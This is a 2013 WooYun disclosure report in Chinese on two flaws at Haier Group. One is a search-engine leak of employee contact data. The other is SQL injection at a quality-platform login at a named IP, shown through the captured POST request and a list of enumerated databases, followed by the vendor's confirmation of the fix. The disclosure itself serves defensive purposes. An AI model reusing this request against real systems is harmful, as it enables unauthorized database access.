当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033797

漏洞标题:海尔集团之4某系统SQL注射及某系统信息泄露

相关厂商:海尔集团

漏洞作者: 小胖子

提交时间:2013-08-08 11:35

修复时间:2013-09-22 11:36

公开时间:2013-09-22 11:36

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-08: 细节已通知厂商并且等待厂商处理中
2013-08-08: 厂商已经确认,细节仅向厂商公开
2013-08-18: 细节向核心白帽子及相关领域专家公开
2013-08-28: 细节向普通白帽子公开
2013-09-07: 细节向实习白帽子公开
2013-09-22: 细节向公众公开

简要描述:

小胖子完成了一次四杀,正在疯狂杀戮!!
小胖子已经主宰比赛!!

详细说明:

问题1:小问题,某系统信息泄露。
缺陷系统地址esp.haier.com没有添加robots.txt 导致搜索引擎抓取。

google.jpg


很多员工的联系方式等等。

.jpg


问题2:某系统SQL高权限注射。
http://218.58.70.220/海尔质量信息管理平台
登陆处没有进行过滤,导致注射。
抓登陆包。

POST /login.asp HTTP/1.1
Host: 218.58.70.220
Proxy-Connection: keep-alive
Content-Length: 21
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://218.58.70.220
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://218.58.70.220/vendor/index.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDDDTTQ=NKEKOJLAHLBHOCBKMJKBGIFO
name=admin&pass=admin


果断是注射的:

SQLIN.jpg


SQL.jpg


读出来的11个数据库。

available databases [11]:
[*] HaierJiance
[*] HaierJiance27
[*] HaierJiance_History
[*] master
[*] mingabc
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


over。

漏洞证明:

见详细说明。

修复方案:

0x1:加上robots防止搜索引擎抓取。
0x2:注入没的说,过滤吧。
0x3:下班回来挖到现在一起提交,累死我了,rank给力点啊!!!!!

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-08-08 15:51

厂商回复:

感谢 @小胖子 的工作。
漏洞1为应用添加robots.txt 文件,禁止所有搜索引擎访问网站的任何部分
漏洞2之前被披露过,已回复为8月13日整改到位。
请各位白帽子持续友好监督海尔信息安全工作,非常感谢。

最新状态:

暂无